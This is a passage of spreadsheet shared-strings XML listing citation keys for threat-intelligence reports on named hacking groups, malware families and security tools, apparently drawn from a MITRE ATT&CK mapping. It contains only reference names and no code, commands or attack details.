    <t>(Citation: Volexity SolarWinds),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN6 April 2016),(Citation: CISA AA21-200A APT40 July 2021),(Citation: PWC Cloud Hopper April 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: McAfee Night Dragon),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Symantec Cicada November 2020),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Mythc Documentation),(Citation: ESET ForSSHe December 2018),(Citation: Kaspersky Lyceum October 2021),(Citation: FireEye POSHSPY April 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: KISA Operation Muzabi),(Citation: Palo Alto OilRig May 2016),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Dell TG-3390),(Citation: cobaltstrike manual),(Citation: Unit42 RDAT July 2020),(Citation: Talos Oblique RAT March 2021),(Citation: FireEye CARBANAK June 2017),(Citation: Rclone),</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Peirates GitHub),(Citation: Microsoft Azure Storage Security, 2019),(Citation: Amazon S3 Security, 2019),(Citation: Amazon  AWS Temporary Security Credentials),(Citation: Google Cloud Encryption Key Rotation)</t>
  </si>
  <si>
    <t>,(Citation: US-CERT-TA18-106A),(Citation: Cisco Securing SNMP),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>,(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018),(Citation: Cisco Securing SNMP),(Citation: US-CERT TA17-156A SNMP Abuse 2017),(Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>(Citation: Visa FIN6 Feb 2019),(Citation: ANSSI Sandworm January 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: ESET ComRAT May 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Internal Solorigate Investigation Blog),(Citation: MSTIC DEV-0537 Mar 2022),</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022),</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022),(Citation: RSAC 2015 Abu Dhabi Stefano Maccaglia),(Citation: NCC Group APT15 Alive and Strong),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cybereason OperationCuckooBees May 2022),(Citation: ESET InvisiMole June 2018),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Talos ZxShell Oct 2014),(Citation: CISA WellMail July 2020),(Citation: Check Point APT34 April 2021),(Citation: KISA Operation Muzabi),(Citation: Symantec Cicada November 2020),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Scarlet Mimic Jan 2016),(Citation: Accenture MUDCARP March 2019),(Citation: NCCGroup RokRat Nov 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Talos GravityRAT),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: ESET Gelsemium June 2021),(Citation: ESET Crutch December 2020),(Citation: Volexity SolarWinds),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: CISA WellMess July 2020),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Secureworks MCMD July 2019),(Citation: ClearSky Siamesekitten August 2021),(Citation: TrendMicro Taidoor),(Citation: Red Canary 2021 Threat Detection Report March 2021),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Wevtutil Microsoft Documentation),(Citation: MSTIC FoggyWeb September 2021),(Citation: Symantec Darkmoon Aug 2005),(Citation: Fidelis njRAT June 2013),(Citation: Symantec Linfo May 2012),(Citation: McAfee Bankshot),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: US-CERT TA18-074A),(Citation: Kaspersky QakBot September 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: DOJ GRU Indictment Jul 2018),(Citation: RiskIQ British Airways September 2018),(Citation: Symantec Pasam May 2012),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Trustwave Pillowmint June 2020),(Citation: DOJ APT10 Dec 2018),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: McAfee GhostSecret),(Citation: Eset Ramsay May 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Profero APT27 December 2020),(Citation: F-Secure Cosmicduke),(Citation: Cybereason PowerLess February 2022),(Citation: Cybereason Soft Cell June 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: McAfee Night Dragon),(Citation: CyberBit Dtrack),(Citation: RiskIQ Newegg September 2018),(Citation: aptsim),(Citation: Cybereason Bazar July 2020),(Citation: Cybereason Bumblebee August 2022),(Citation: Accenture Lyceum Targets November 2021),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Github Koadic),(Citation: F-Secure Lazarus Cryptocurrency Aug 2020),(Citation: Microsoft POLONIUM June 2022),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Dust Storm),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: FireEye APT37 Feb 2018),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: FireEye MuddyWater Mar 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Lee 2013),(Citation: Talos Frankenstein June 2019),(Citation: CrowdStrike IceApple May 2022),(Citation: Palo Alto Rover),(Citation: Proofpoint TA505 October 2019),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Novetta Blockbuster RATs),(Citation: NTT Security Flagpro new December 2021),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Microsoft GALLIUM December 2019),(Citation: NSA/FBI Drovorub August 2020),(Citation: TrendMicro Pawn Storm 2019),(Citation: ESET LightNeuron May 2019),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: trendmicro xcsset xcode project 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: Symantec Chafer February 2018),(Citation: ClearSky Lazarus Aug 2020),(Citation: FireEye APT30),(Citation: Kroll RawPOS Jan 2017),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: ESET ForSSHe December 2018),(Citation: Prevailion DarkWatchman 2021),(Citation: Kaspersky APT Trends Q1 2020),(Citation: ESET Machete July 2019),(Citation: McAfee Honeybee),(Citation: PWC WellMess July 2020),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Check Point Warzone Feb 2020),(Citation: Novetta Blockbuster Loaders),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Unit 42 Kazuar May 2017),(Citation: NCSC Joint Report Public Tools),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: CheckPoint Bandook Nov 2020),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: Cymmetria Patchwork),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: ANSSI Sandworm January 2021),(Citation: Group IB APT 41 June 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: TrendMicro RawPOS April 2015),(Citation: Microsoft NICKEL December 2021),(Citation: Securelist Kimsuky Sept 2013),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET DazzleSpy Jan 2022),(Citation: Antiy CERT Ramsay April 2020),(Citation: Unit 42 PingPull Jun 2022),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: FSI Andariel Campaign Rifle July 2017),(Citation: Cybereason Kimsuky November 2020),(Citation: Red Canary Qbot),(Citation: Bitdefender Naikon April 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: Kaspersky TajMahal April 2019),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: ESET Dukes October 2019),(Citation: Korean FSI TA505 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: S2 Grupo TrickBot June 2017),(Citation: Novetta Blockbuster),(Citation: F-Secure The Dukes),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: PaloAlto Patchwork Mar 2018),(Citation: FireEye Fin8 May 2016),(Citation: Kaspersky Lyceum October 2021),(Citation: Securelist Calisto July 2018),(Citation: Novetta-Axiom),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Trend Micro FIN6 October 2019),(Citation: Trend Micro IXESHE 2012),(Citation: Microsoft Actinium February 2022),(Citation: Überwachung APT28 Forfiles June 2015),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: BlackBerry Amadey 2020),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: FOX-IT May 2016 Mofang),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: SecureWorks August 2019),(Citation: Trend Micro Muddy Water March 2021),(Citation: ASERT Donot March 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Group IB GrimAgent July 2021),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: GitHub PowerSploit May 2012),(Citation: McAfee Lazarus Jul 2020),(Citation: Forcepoint Monsoon),(Citation: Symantec Hydraq Jan 2010),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Talos TinyTurla September 2021),</t>
  </si>
  <si>
    <t>(Citation: F-Secure Cosmicduke),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: PWC Cloud Hopper April 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: ESET Gamaredon June 2020),(Citation: Symantec Sowbug Nov 2017),(Citation: Eset Ramsay May 2020),(Citation: Forcepoint Monsoon),(Citation: DFIR Conti Bazar Nov 2021),(Citation: NHS Digital Egregor Nov 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: ESET Turla PowerShell May 2019),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Eset Ramsay May 2020),(Citation: Kaspersky Sofacy),(Citation: KISA Operation Muzabi),(Citation: Cylance Machete Mar 2017),(Citation: F-Secure Cosmicduke),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Talos GravityRAT),(Citation: FireEye APT30),(Citation: ESET Crutch December 2020),(Citation: ESET Sednit USBStealer 2014),(Citation: CheckPoint Naikon May 2020),(Citation: ESET Machete July 2019),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Palo Alto Rover),(Citation: ESET Operation Groundbait),(Citation: Symantec Waterbug Jun 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: ESET InvisiMole June 2020),(Citation: Microsoft SIR Vol 19),(Citation: Talos Oblique RAT March 2021),(Citation: Kaspersky Transparent Tribe August 2020),</t>
  </si>
  <si>
    <t>(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Talos Group123),(Citation: wardle evilquest partii),(Citation: NCCGroup RokRat Nov 2018),(Citation: ClearSky Lazarus Aug 2020),(Citation: Malwarebytes RokRAT VBA January 2021),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: UK NCSC Olympic Attacks October 2020),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: CERT-EE Gamaredon January 2021),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Check Point Meteor Aug 2021),(Citation: Fortinet Diavol July 2021),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: Microsoft DUBNIUM July 2016),(Citation: Check Point Sunburst Teardrop December 2020),(Citation: ESET InvisiMole June 2018),(Citation: McAfee Lazarus Nov 2020),(Citation: CISA WellMail July 2020),(Citation: Check Point APT34 April 2021),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Cybereason Astaroth Feb 2019),(Citation: NCC Group Fivehands June 2021),(Citation: Accenture MUDCARP March 2019),(Citation: Unit 42 Shamoon3 2018),(Citation: Cybereason Molerats Dec 2020),(Citation: Cybereason Valak May 2020),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: ClearSky MuddyWater Nov 2018),(Citation: TrendMicro Lazarus Nov 2018),(Citation: Talos Smoke Loader July 2018),(Citation: Unit42 Cannon Nov 2018),(Citation: Proofpoint Bumblebee April 2022),(Citation: ESET Casbaneiro Oct 2019),(Citation: Cybereason Egregor Nov 2020),(Citation: APT15 Intezer June 2018),(Citation: Unit 42 Nokki Oct 2018),(Citation: TrendMicro Gamaredon April 2020),(Citation: Joe Sec Trickbot),(Citation: Intel 471 REvil March 2020),(Citation: TrendMicro EarthLusca 2022),(Citation: MuddyWater TrendMicro June 2018),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: PWC WellMess C2 August 2020),(Citation: NCC Group TA505),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Unit42 Azorult Nov 2018),(Citation: ESET Gelsemium June 2021),(Citation: CISA WellMess July 2020),(Citation: Lazarus APT January 2022),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Microsoft FinFisher March 2018),(Citation: Symantec Dyre June 2015),(Citation: Sophos Netwalker May 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Proofpoint Azorult July 2018),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: FireEye FiveHands April 2021),(Citation: Kaspersky Sodin July 2019),(Citation: MSTIC FoggyWeb September 2021),(Citation: Medium KONNI Jan 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Medium Babuk February 2021),(Citation: Talos MuddyWater Jan 2022),(Citation: FireEye Hancitor),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: FireEye Metamorfo Apr 2018),(Citation: objsee mac malware 2017),(Citation: Trustwave Pillowmint June 2020),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Sogeti CERT ESEC Babuk March 2021),(Citation: Threatpost Hancitor),(Citation: Palo Alto Networks BBSRAT),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: Eset Ramsay May 2020),(Citation: Cisco Ukraine Wipers January 2022),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: CISA SoreFang July 2016),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Trend Micro Waterbear December 2019),(Citation: Cybereason PowerLess February 2022),(Citation: CISA AppleJeus Feb 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: G Data Sodinokibi June 2019),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Talos Bisonal Mar 2020),(Citation: TrendMicro TropicTrooper 2015),(Citation: Symantec Sowbug Nov 2017),(Citation: CoinTicker 2019),(Citation: Microsoft Expand Utility),(Citation: Malwarebytes Dyreza November 2015),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Cybereason Bazar July 2020),(Citation: Talos Rocke August 2018),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Arxiv Avaddon Feb 2021),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Malwarebytes Targeted Attack against Saudi Arabia),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: McAfee Sodinokibi October 2019),(Citation: Unit 42 Valak July 2020),(Citation: Novetta Winnti April 2015),(Citation: Unit 42 Tropic Trooper Nov 2016),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: NHS Digital Egregor Nov 2020),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: JPCert TSCookie March 2018),(Citation: Cylance Dust Storm),(Citation: Rancor Unit42 June 2018),(Citation: ESET Okrum July 2019),(Citation: Accenture HyperStack October 2020),(Citation: IBM TA505 April 2020),(Citation: Securelist Dtrack),(Citation: Unit42 Molerat Mar 2020),(Citation: objective-see windtail1 dec 2018),(Citation: FireEye FIN7 Oct 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: Chronicle Winnti for Linux May 2019),(Citation: BiZone Lizar May 2021),(Citation: Carbon Black Shlayer Feb 2019),(Citation: FireEye MuddyWater Mar 2018),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: ESET Zebrocy Nov 2018),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CrowdStrike IceApple May 2022),(Citation: FireEye APT10 Sept 2018),(Citation: Talos Frankenstein June 2019),(Citation: Mcafee Clop Aug 2019),(Citation: Trend Micro Skidmap),(Citation: Talos Lokibot Jan 2021),(Citation: Check Point APT31 February 2021),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Proofpoint TA505 October 2019),(Citation: Qualys LolZarus),(Citation: ESET Turla PowerShell May 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Talos PoetRAT October 2020),(Citation: FinFisher Citation),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Palo Alto Sofacy 06-2018),(Citation: Morphisec ShellTea June 2019),(Citation: Unit 42 Lucifer June 2020),(Citation: Malwarebytes Higaisa 2020),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Cisco Talos Intelligence Group),(Citation: NSA/FBI Drovorub August 2020),(Citation: FireEye MESSAGETAP October 2019),(Citation: ESET LightNeuron May 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: Cybereason Conti Jan 2021),(Citation: Medium S2W WhisperGate January 2022),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Unit 42 Sofacy Feb 2018),(Citation: OilRig New Delivery Oct 2017),(Citation: NCC Group Team9 June 2020),(Citation: Lab52 WIRTE Apr 2019),(Citation: Accenture Hogfish April 2018),(Citation: Securelist APT10 March 2021),(Citation: ESET Telebots Dec 2016),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: BleepingComputer Molerats Dec 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Trend Micro Tick November 2019),(Citation: ESET Grandoreiro April 2020),(Citation: ESET Telebots July 2017),(Citation: Symantec Orangeworm April 2018),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: FireEye APT34 Dec 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: CheckPoint Naikon May 2020),(Citation: CISA ComRAT Oct 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Medium Ali Salem Bumblebee April 2022),(Citation: ESET ForSSHe December 2018),(Citation: McAfee Honeybee),(Citation: ESET Machete July 2019),(Citation: PWC WellMess July 2020),(Citation: Talos Zeus Panda Nov 2017),(Citation: Check Point Warzone Feb 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citation: NCC Group WastedLocker June 2020),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Unit42 RDAT July 2020),(Citation: Unit 42 Bisonal July 2018),(Citation: Unit 42 Siloscape Jun 2021),(Citation: ESET Industroyer),(Citation: CheckPoint Bandook Nov 2020),(Citation: Symantec RAINDROP January 2021),(Citation: Zscaler Higaisa 2020),(Citation: ESET Carbon Mar 2017),(Citation: McAfee Sharpshooter December 2018),(Citation: ANSSI Sandworm January 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Fidelis TrickBot Oct 2016),(Citation: Microsoft NICKEL December 2021),(Citation: ESET Ebury Oct 2017),(Citation: 20 macOS Common Tools and Techniques),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET DazzleSpy Jan 2022),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: Unit 42 PingPull Jun 2022),(Citation: Bitdefender Naikon April 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: Flashpoint FIN 7 March 2019),(Citation: ESET Dukes October 2019),(Citation: Cyberint Qakbot May 2021),(Citation: Korean FSI TA505 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Gh0stRAT ATT March 2019),(Citation: ESET ComRAT May 2020),(Citation: Secureworks REvil September 2019),(Citation: ESET Kobalos Jan 2021),(Citation: Talos Cobalt Strike September 2020),(Citation: CISA AA20-301A Kimsuky),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Cybereason Chaes Nov 2020),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Unit 42 Hildegard Malware),(Citation: ESET Operation Spalax Jan 2021),(Citation: Cylance Sodinokibi July 2019),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Kaspersky MoleRATs April 2019),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: Microsoft Actinium February 2022),(Citation: US-CERT TYPEFRAME June 2018),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: sentinelone shlayer to zshlayer),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: CIRCL PlugX March 2013),(Citation: Securelist LuckyMouse June 2018),(Citation: FOX-IT May 2016 Mofang),(Citation: IBM MegaCortex),(Citation: SecureWorks August 2019),(Citation: ATT QakBot April 2021),(Citation: ESET PipeMon May 2020),(Citation: Unit 42 QUADAGENT July 2018),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: Group IB GrimAgent July 2021),(Citation: Intezer HiddenWasp Map 2019),(Citation: Talent-Jump Clambling February 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: US-CERT Bankshot Dec 2017),(Citation: Unit42 BendyBear Feb 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Securelist Remexi Jan 2019),(Citation: Unit 42 RGDoor Jan 2018),(Citation: Securelist Darkhotel Aug 2015),(Citation: CarbonBlack Conti July 2020),(Citation: Cyberreason Anchor December 2019),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: ESET InvisiMole June 2020),(Citation: Unit 42 KerrDown February 2019),</t>
  </si>
  <si>
    <t>(Citation: Intezer TeamTNT September 2020),(Citation: Peirates GitHub),(Citation: Aqua Kinsing April 2020),(Citation: Intezer Doki July 20),(Citation: Cisco Talos Intelligence Group),(Citation: Trend Micro TeamTNT),(Citation: Docker Daemon Socket Protect),(Citation: Kubernetes Hardening Guide),(Citation: Kubernetes API Control Access)</t>
  </si>
  <si>
    <t>(Citation: VirusBulletin Kimsuky October 2019),</t>
  </si>
  <si>
    <t>(Citation: Bitdefender StrongPity June 2020),(Citation: Unit 42 BackConfig May 2020),</t>
  </si>
  <si>
    <t>(Citation: Talos Promethium June 2020),(Citation: PWC WellMess July 2020),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: PWC WellMess C2 August 2020),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: KISA Operation Muzabi),(Citation: ESET Lazarus Jun 2020),(Citation: CISA AppleJeus Feb 2021),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: Checkpoint MosesStaff Nov 2021),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: FBI Flash FIN7 USB),(Citation: ClearSky Lazarus Aug 2020),(Citation: Unit 42 Hildegard Malware),(Citation: Recorded Future Turla Infra 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Google TAG Lazarus Jan 2021),(Citation: Cylance Cleaver),(Citation: FoxIT Wocao December 2019),(Citation: FireEye FIN7 Oct 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: McAfee Sharpshooter December 2018),(Citation: Microsoft NICKEL December 2021),</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: Symantec Elfin Mar 2019),(Citation: IBM MegaCortex),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Medium S2W WhisperGate January 2022),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Cisco CaddyWiper March 2022),(Citation: Qualys Hermetic Wiper March 2022),(Citation: Symantec Shamoon 2012),(Citation: Novetta Blockbuster),(Citation: Unit 42 Shamoon3 2018),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Medium S2W WhisperGate January 2022),(Citation: Microsoft WhisperGate January 2022),(Citation: US-CERT SHARPKNOT June 2018),(Citation: FireEye Shamoon Nov 2016),(Citation: Talos Group123),(Citation: US-CERT Ukraine Feb 2016),(Citation: ESET CaddyWiper March 2022),(Citation: Unit 42 WhisperGate January 2022),(Citation: Symantec Elfin Mar 2019),(Citation: Crowdstrike WhisperGate January 2022),(Citation: Trend Micro KillDisk 1),(Citation: FireEye APT38 Oct 2018),(Citation: ESET Telebots June 2017),(Citation: SentinelOne Hermetic Wiper February 2022),(Citation: FireEye APT37 Feb 2018),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Cybereason WhisperGate February 2022),(Citation: Symantec Ukraine Wipers February 2022),(Citation: Ready.gov IT DRP)</t>
  </si>
  <si>
    <t>,(Citation: Microsoft WMI Filters),(Citation: Wald0 Guide to GPOs),(Citation: Microsoft GPO Security Filtering),(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>(Citation: AADInternals Documentation),(Citation: Secureworks IRON RITUAL Profile),(Citation: Azure AD Federation Vulnerability),(Citation: Microsoft 365 Defender Solorigate),</t>
  </si>
  <si>
    <t>(Citation: Check Point Meteor Aug 2021),(Citation: Cybereason Egregor Nov 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: Intrinsec Egregor Nov 2020),(Citation: Crowdstrike Indrik November 2018),(Citation: Github PowerShell Empire),(Citation: Microsoft WMI Filters),(Citation: Wald0 Guide to GPOs),(Citation: Microsoft GPO Security Filtering),(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>(Citation: GitHub PoshC2),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: NCC Group Team9 June 2020),(Citation: Fortinet TrickBot),(Citation: TrendMicro EarthLusca 2022),(Citation: Github PowerShell Empire),(Citation: Cybereason Bazar July 2020),(Citation: FireEye FIN6 Apr 2019),(Citation: CrowdStrike BloodHound April 2018),(Citation: Volexity SolarWinds),(Citation: Bitdefender FIN8 July 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Symantec Bumblebee June 2022),(Citation: Cyberreason Anchor December 2019),(Citation: PowerSploit Documentation),(Citation: Kaspersky QakBot September 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: GitHub PowerSploit May 2012),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Harmj0y Domain Trusts),(Citation: Nltest Manual),(Citation: NCC Group Chimera January 2021),(Citation: Harmj0y Domain Trusts)</t>
  </si>
  <si>
